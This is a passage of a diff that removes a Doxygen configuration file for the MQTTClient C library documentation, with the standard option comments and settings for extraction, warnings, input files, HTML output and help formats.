-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-INPUT                  = MQTTClient.h \
-                         MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
